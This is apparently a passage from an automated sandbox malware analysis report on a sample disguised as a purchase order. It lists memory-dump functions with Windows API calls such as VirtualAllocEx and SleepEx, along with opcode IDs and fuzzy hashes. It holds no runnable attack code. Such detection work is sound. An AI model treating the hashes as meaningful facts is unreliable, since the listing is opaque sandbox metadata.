                                        • Opcode Fuzzy Hash: a84bdd2d5665d8f1831f7fdbb555f8e2eb14530a9ea4e4bcdfccf778c675df12
                                        • Instruction Fuzzy Hash: 641113719003499FDB10DFAAC880B9EFBF4EF88320F10842AD419A7200C7799940CFA1
                                        APIs
                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,55070B4A), ref: 0719D2B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: ae3a5147512064b042f8c7f3de9c4607c8608898fd873ec769873ffe017d377f
                                        • Instruction ID: 3a24dec8956a7a5d508baceb5ecc19281e6cff42a5453f98a1875fd5102ab4b3
                                        • Opcode Fuzzy Hash: ae3a5147512064b042f8c7f3de9c4607c8608898fd873ec769873ffe017d377f
                                        • Instruction Fuzzy Hash: 7F1179B19003598FDB10CFAAC845BEFFBF8EF88320F14842AD455A7240CB389944CBA4
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071F2796
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346955002.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: true
                                        • Associated: 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_71a0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 1cfbf49ecce769de5a511cae3c374d27d38c2b6fccaaedc2e81183fd378843c0
                                        • Instruction ID: 1f5ef4d8f382f9098acc47825c2b46d3fe4dc2bb41b74ec834c65be87de65977
                                        • Opcode Fuzzy Hash: 1cfbf49ecce769de5a511cae3c374d27d38c2b6fccaaedc2e81183fd378843c0
                                        • Instruction Fuzzy Hash: F11123759003499FDB10DFAAC845BDEBBF5FF88320F148819E519A7250C779A940CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 6d8e18273c641fa7cd66fd577b7cb0c9e3be248f3e4ade9d853c8f9d6f4e55c6
                                        • Instruction ID: 249f7f999313d95f448e6a4b093b98390c89c239971265a33c2694655c5b6db9
                                        • Opcode Fuzzy Hash: 6d8e18273c641fa7cd66fd577b7cb0c9e3be248f3e4ade9d853c8f9d6f4e55c6
                                        • Instruction Fuzzy Hash: C6E1AD74945228CFEBA5DF19D884BEAB7B2EF49304F1091EAD50AA7350DB745E80CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: a97ddafe19f4c343b2861a35e89fc459f671bb31147eeed7028480d9ac7b086a
                                        • Instruction ID: 11d48b5a87f723d9b0255974fa58d204e7c3942c95223b35dad710a87a1a292f
                                        • Opcode Fuzzy Hash: a97ddafe19f4c343b2861a35e89fc459f671bb31147eeed7028480d9ac7b086a
                                        • Instruction Fuzzy Hash: AEA1BE74905228CFEBA5CF59D884BEAB7B2EF89304F1091EAD509A7254D7745EC0CFA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: a3022e6285d3a63b201e091b546de555603796a07e4d8cc055507e28f69bc515
                                        • Instruction ID: f0ca18a6cfef64a1dbb1e5593ecfbe5a9dbae279ea365737ad8ca1aec48a0959
                                        • Opcode Fuzzy Hash: a3022e6285d3a63b201e091b546de555603796a07e4d8cc055507e28f69bc515
                                        • Instruction Fuzzy Hash: 45A1C074905228CFEBA5CF59D884BEAB7B2EF89304F1091EAD509A7254D7745E80CFA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: 71e156d5bc843f9b5e96719866e66d7445a9bfd613c47bad7c71ddada443c66c
                                        • Instruction ID: 6bff0f313ca9972b6cdf18b69710f2ee571a876812f93ba7124b6575768326eb
                                        • Opcode Fuzzy Hash: 71e156d5bc843f9b5e96719866e66d7445a9bfd613c47bad7c71ddada443c66c
                                        • Instruction Fuzzy Hash: 7F61BF74944218CFEF40CF99D888BDDBBF5FF4A304F199159E406AB286C37898898F65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: 8eadfb43e07d561e4ae3a628fedb51d4e5f9c14e01e8349e14d386edecc01d96
                                        • Instruction ID: f2eef5c0d54220bc749768a27f56d215b3c7a6d56a0cbd67d7a3e8607a6e6a4c
                                        • Opcode Fuzzy Hash: 8eadfb43e07d561e4ae3a628fedb51d4e5f9c14e01e8349e14d386edecc01d96
                                        • Instruction Fuzzy Hash: BD51CF74A44218CFEF40CF99D888BDDBBB5FF4A304F189159E40AAB286C33498858F65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: 00ffbf6a8e870b3a665a2fe853ebd83c10fdef3420bf91af2c10f87501ce48bf
                                        • Instruction ID: ec61143d76ca1f266aceebb5a845de9ced4b99da7e9aea4b6bf4cb1f1849d044
                                        • Opcode Fuzzy Hash: 00ffbf6a8e870b3a665a2fe853ebd83c10fdef3420bf91af2c10f87501ce48bf
                                        • Instruction Fuzzy Hash: A251CF74A44218CFEF40CF99D888BDDBBB5FF4A304F189159E40AAB286C33498858F65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: d75564d3b39346f9cf2ea4d80a11b312668ab160fa9ba29ac5aeeb112eed2be1
                                        • Instruction ID: 5859c38acda5e4271236185a1788878aa483b31b51dc3b43b22e83014ab91811
                                        • Opcode Fuzzy Hash: d75564d3b39346f9cf2ea4d80a11b312668ab160fa9ba29ac5aeeb112eed2be1
                                        • Instruction Fuzzy Hash: AA41AE74944218CFEF40CF9AD488BDDBBB5FF4A304F196119E40AAB296C3789885CB65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '
                                        • API String ID: 0-1997036262
                                        • Opcode ID: 41f69e38baafe7d718ce7fa4a4832bc5c3034379769aad6629700c65b36b358a
                                        • Instruction ID: 93d67f5b4963b2e62491b0695ce7eacce4eddf031c678900562da22b5270f292
                                        • Opcode Fuzzy Hash: 41f69e38baafe7d718ce7fa4a4832bc5c3034379769aad6629700c65b36b358a
                                        • Instruction Fuzzy Hash: 9941CF70945218CFEF40CF9AD488BDDBBF5FF4A304F186119E40AAB296C3789885CB65
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06D3135B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 336e7140726918a6ccfc93e44c373a578b8f65eee2f3ad8407cdc19d033af927
                                        • Instruction ID: 24822437447035ffd834816cf75830bd9abe044fb84d4565d158a57209da84e2
                                        • Opcode Fuzzy Hash: 336e7140726918a6ccfc93e44c373a578b8f65eee2f3ad8407cdc19d033af927
                                        • Instruction Fuzzy Hash: F21144719002499FDB20DFAAC845BEEBBF5AF89320F24841DD469A7240CB799545CB90
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06D3135B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 79e17da7fa537e67cdbfd51800ca5a3018b6d8f9e545672aa24e2232a555992f
                                        • Instruction ID: 3200a069267250ac7ddccc42c438cbda7dc5486e2bb35b34b3ee0450fcd3c18a
                                        • Opcode Fuzzy Hash: 79e17da7fa537e67cdbfd51800ca5a3018b6d8f9e545672aa24e2232a555992f
                                        • Instruction Fuzzy Hash: EE113475900349DFDB10DFAAC845BEEBBF5EF88720F148419D569A7240C779A540CBA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5
                                        • API String ID: 0-2226203566
                                        • Opcode ID: 756b35a0effcf6d27853229d9462f876445d320f30032d858c7932f8e4c49511
                                        • Instruction ID: 00730589d3413c5aa0b80ad12c7fc9c49e35612bdcbf715db27247c48f3bbc54
                                        • Opcode Fuzzy Hash: 756b35a0effcf6d27853229d9462f876445d320f30032d858c7932f8e4c49511
                                        • Instruction Fuzzy Hash: 1F018C70A202289FDF90CF18DD84BA9B7B6FF48304F108595A509E7251DB35AE89CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: aaff038bac9d844028bd024302c5a83c5da61d78bf9cde5d90e17aa5409fdac0
                                        • Instruction ID: a687024f441ff69d147201e5fbf7ea611f8596cf4d4fec70397be0105e53899a
                                        • Opcode Fuzzy Hash: aaff038bac9d844028bd024302c5a83c5da61d78bf9cde5d90e17aa5409fdac0
                                        • Instruction Fuzzy Hash: 1001C4B0C14268CFDF61CF64D844BDDB7B1BB19308F1011EAE908A2280D3744A84DF42
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 90412049bc86fe1183fef7a4305e217fc34fd82e89a1694b8b54ab71d48d363c
                                        • Instruction ID: 4a93d8fc0c925a1923f38b50a29f23d0a72faa6ef9a6cb1a658279135eee405c
                                        • Opcode Fuzzy Hash: 90412049bc86fe1183fef7a4305e217fc34fd82e89a1694b8b54ab71d48d363c
                                        • Instruction Fuzzy Hash: 95E0B674E402589FDB60CF24C844BD9BBF0AB48300F1080DAA90DA7240C6759EC0CF44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: eb85393db334326a6eb5f082058ecbc0ea115f7d67f8c73c9f35e52bca0186ed
                                        • Instruction ID: 92b20a313b91180a4fb07fcbd53d2bd7cb70fc2b5bb126938888b53bceadc898
                                        • Opcode Fuzzy Hash: eb85393db334326a6eb5f082058ecbc0ea115f7d67f8c73c9f35e52bca0186ed
                                        • Instruction Fuzzy Hash: 92D048B4915268CFCB66CF24C880ADDBBB6AB58308F1050DAD908A2244D7759B81DE40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;
                                        • API String ID: 0-1661535913
                                        • Opcode ID: 58c6bce27c9035251388005e8da5a636e980675f2e6197a446064b024b63ceac
                                        • Instruction ID: cdc5a806331f250f6b7354a3e59d3079286981105062c6e7bb6ff710d3774692
                                        • Opcode Fuzzy Hash: 58c6bce27c9035251388005e8da5a636e980675f2e6197a446064b024b63ceac
                                        • Instruction Fuzzy Hash: 19D0C9306411088FDB81DF94E468AAF7376FB4D344F20D094A606A7748CB346D05CF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 9
                                        • API String ID: 0-2366072709
                                        • Opcode ID: 2826e0901bb1d9102da379ee4ca14bb67fa43705e85c5fd235a72f0eb7234dcc
                                        • Instruction ID: 3390d8e1083feb0825beb8c8a93e69db0370d26aed6307b339b98ec3e73f2672
                                        • Opcode Fuzzy Hash: 2826e0901bb1d9102da379ee4ca14bb67fa43705e85c5fd235a72f0eb7234dcc
                                        • Instruction Fuzzy Hash: 63D09275D08119CFDBA18F60D854BD9BBB5AB85340F1011A68A0DA3240CB345AC5CF04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '
                                        • API String ID: 0-1997036262
                                        • Opcode ID: e9f5e7c7d318d3147a9e570c1e8067a1141afb1edd726f97610320dc9c6a4ab6
                                        • Instruction ID: 7a675c8b218b3cbbfd9dc2edd7094d7c6b85431be41ac7fb08f65a275a40a7f1
                                        • Opcode Fuzzy Hash: e9f5e7c7d318d3147a9e570c1e8067a1141afb1edd726f97610320dc9c6a4ab6
                                        • Instruction Fuzzy Hash: A2D06CB4D25228CBEB25CB54DD80A8AB6B4AB14308F0061D99848B3240D3309A808F81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6
                                        • API String ID: 0-498629140
                                        • Opcode ID: d8a0c6da89e98b89ec669c9114b30b33ad8c8d9bfd819dbea80e4119aaa4ee6c
                                        • Instruction ID: 0aed369a02b80001318d69e2457b107fd0b859614829988c30d7f7c06cc7be1b
                                        • Opcode Fuzzy Hash: d8a0c6da89e98b89ec669c9114b30b33ad8c8d9bfd819dbea80e4119aaa4ee6c
                                        • Instruction Fuzzy Hash: 10D0E974D14218DBEF50DFA5D840B9DF7B6AB45300F00D1DA981967344D7715A458F61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0428a06a3103d7e974bbbe5baacfbdcace76ef7be6d459ad1dc92f0abd98a2be
                                        • Instruction ID: 7c12551277cd006dbf8130ea4a7bb9d4d86e34a91af387559482a82ca216f669
                                        • Opcode Fuzzy Hash: 0428a06a3103d7e974bbbe5baacfbdcace76ef7be6d459ad1dc92f0abd98a2be
                                        • Instruction Fuzzy Hash: 53521AB5A002298FDB64DF69C950BEDBBF6BF88300F1581D9E509AB351DA309D81CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7bae06babc0e551af15db9207e3d96c3471c0a0be04be93fa37392c320c6be2
                                        • Instruction ID: 1f76dee68b559536eb96c3b3bb1b25a396e047c0e120d71d5d5655ff6466a946
                                        • Opcode Fuzzy Hash: c7bae06babc0e551af15db9207e3d96c3471c0a0be04be93fa37392c320c6be2
                                        • Instruction Fuzzy Hash: BF228C31A006149FDB44CFA5D894AADB7F6FF88304F158069E906EB3A1DB75EC41CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03de3d6aa8e9b71cb55a2d5c4a8283e7f1c10547faf57332e0d2cb07c53b73f8
                                        • Instruction ID: 99f979ab968b229443158cabf84d5e598074e5e01e22cb70831a60e6ffed08d6
                                        • Opcode Fuzzy Hash: 03de3d6aa8e9b71cb55a2d5c4a8283e7f1c10547faf57332e0d2cb07c53b73f8
                                        • Instruction Fuzzy Hash: B8124A31A002058FDB64DFA9D894AAEB7F2FF88300F14856DE5469B395DB31EC46CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f2bc3c0a3233f91ac8f85e393dc630fc524e922ad4762682ff92ba22d497bf3
                                        • Instruction ID: 657b009e6c7b6e7f928bfea5d0b65ba4fd7a0829e8facc3d8c484017f837cd04
                                        • Opcode Fuzzy Hash: 3f2bc3c0a3233f91ac8f85e393dc630fc524e922ad4762682ff92ba22d497bf3
                                        • Instruction Fuzzy Hash: 6212F874A00219CFCB54EF68C894B9DB7B6BF89300F5186A9D54AAB365DF30AD85CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2afc68083ffce6691292dd683baf7ac4169ffd7bcf0acbed7c6ab1ea1552ac89
                                        • Instruction ID: ef941972cb32aeba6909f1cfbd94fd239f7f2aca03bceb6e1d0066f949407c5d
                                        • Opcode Fuzzy Hash: 2afc68083ffce6691292dd683baf7ac4169ffd7bcf0acbed7c6ab1ea1552ac89
                                        • Instruction Fuzzy Hash: CEE1CFB47082028FDB549F2AC49467EBBE7AF85300F168669E992CB3A1DB35CC45CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d05d6eec9c9f7802a44b8a90dcc402e79e8406071bc7ef93c23bc41e34cbcd3
                                        • Instruction ID: 9023996e62273e559a7f30a3ef5cd064b92ec4c9bcc524f50439a003abf73b17
                                        • Opcode Fuzzy Hash: 1d05d6eec9c9f7802a44b8a90dcc402e79e8406071bc7ef93c23bc41e34cbcd3
                                        • Instruction Fuzzy Hash: 29F10B74A10618CFCB08DFA4D998E9DB7B6FF89300F118659E906AB365DB70EC46CB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344272105.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d60000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6dc86f989dbc5647a87e28e294cf61010fff6127da8a185398a7d3d04f0c79f5
                                        • Instruction ID: 33202ffaf41611b351ef92b2ed0df71f00940fb5bb2b87659704ab7709259d5a
                                        • Opcode Fuzzy Hash: 6dc86f989dbc5647a87e28e294cf61010fff6127da8a185398a7d3d04f0c79f5
                                        • Instruction Fuzzy Hash: C1F1D474E11218DFCB94DFA6E4986ECBBB6FF49306F208569E406A7350CB319885CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1dee5b378f154a6d29c806cb619e97f11e28ab8c33c9c4efd31c7f06270d9c3
                                        • Instruction ID: 1a4629508ea721dd147fc5179b5482df8934ef429aea93befe28abdee48d6495
                                        • Opcode Fuzzy Hash: d1dee5b378f154a6d29c806cb619e97f11e28ab8c33c9c4efd31c7f06270d9c3
                                        • Instruction Fuzzy Hash: CEE15574A01609DFDB04EF64D4949ADBBB6FF89310F108569E806AB364DF30EC46CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93d2cf72cd5fb9e99ef0e621a379b2c181f784e191a1278d18b9dccbf2c2fb3c
                                        • Instruction ID: a6936cc5bbd467a3c10b226f46daeaa382eaaf7a2e5d1f202e3dbf2191860f27
                                        • Opcode Fuzzy Hash: 93d2cf72cd5fb9e99ef0e621a379b2c181f784e191a1278d18b9dccbf2c2fb3c
                                        • Instruction Fuzzy Hash: 8DE137B4E04218CFDB60DF65D880BADB7B6FB5A300F1092AAD419A7394DB346D81CF52
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36bbea8c57db61dc2b44c0b42ca788bafbeabe3fe3ccf917b6aa2c33d4d62b10
                                        • Instruction ID: 9ef328cc051856d7e835f37e4cef53be5e12cbe76a3c92d2bcd37a6428e58353
                                        • Opcode Fuzzy Hash: 36bbea8c57db61dc2b44c0b42ca788bafbeabe3fe3ccf917b6aa2c33d4d62b10
                                        • Instruction Fuzzy Hash: 92A1C035B052059FCB04CFA5DA54AADBBF2EF89321F14806AE916DB391CB35DD41CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d72ccf7d1c7faf10106a0d715a7bc19a724226c0e615fe2d65959840c64c22d
                                        • Instruction ID: f065cef9c4a19b7705bf292f1132040a9cffec7375390d8bf4c53bc52ddaf6f8
                                        • Opcode Fuzzy Hash: 8d72ccf7d1c7faf10106a0d715a7bc19a724226c0e615fe2d65959840c64c22d
                                        • Instruction Fuzzy Hash: 5BA14B75A00218CFDB54DF68C494A9DBBF6FF89310B1585A9E9469B361DB30EC42CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 083c9a21a5e77cb5a2f0d0d1d915929934b50825714ddfe2b0cc610e601debb4
                                        • Instruction ID: d6fd7e7c24caac1a554a2f6170927cc56e7fe8f20bc4bf307508e1f42f9688f2
                                        • Opcode Fuzzy Hash: 083c9a21a5e77cb5a2f0d0d1d915929934b50825714ddfe2b0cc610e601debb4
                                        • Instruction Fuzzy Hash: EBD1DF75E41229CFDB60EF25D948B99FBB1BB4A708F0044EAD60EA2650DB745EC4CF02
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56494d8f11e60a6ce441a3499c09554c2940b008d4be1f8798bd24f9ec32f53f
                                        • Instruction ID: ef4173b6b4f8ba6467ffceb9b87263f7bf6937097a54ffd83a1f2a428f1550e6
                                        • Opcode Fuzzy Hash: 56494d8f11e60a6ce441a3499c09554c2940b008d4be1f8798bd24f9ec32f53f
                                        • Instruction Fuzzy Hash: 0DA10B74A10618DFCB04DFA4D894E9DB7B6FF89300F158669E906AB361DF70AC46CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e615d7f3ba9f3bbd3aa35d19615b2a107fb62f539fcc8295a17d0fa843573073
                                        • Instruction ID: 1e501e73c2afd1d0281c8cdfae2487f493099a0861c5d3694413655f6bbc0a1a
                                        • Opcode Fuzzy Hash: e615d7f3ba9f3bbd3aa35d19615b2a107fb62f539fcc8295a17d0fa843573073
                                        • Instruction Fuzzy Hash: AF916A70B10214DFDB04DF68D494AADBBBABF89710F1041A9E906DB3A5CB71EC41CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
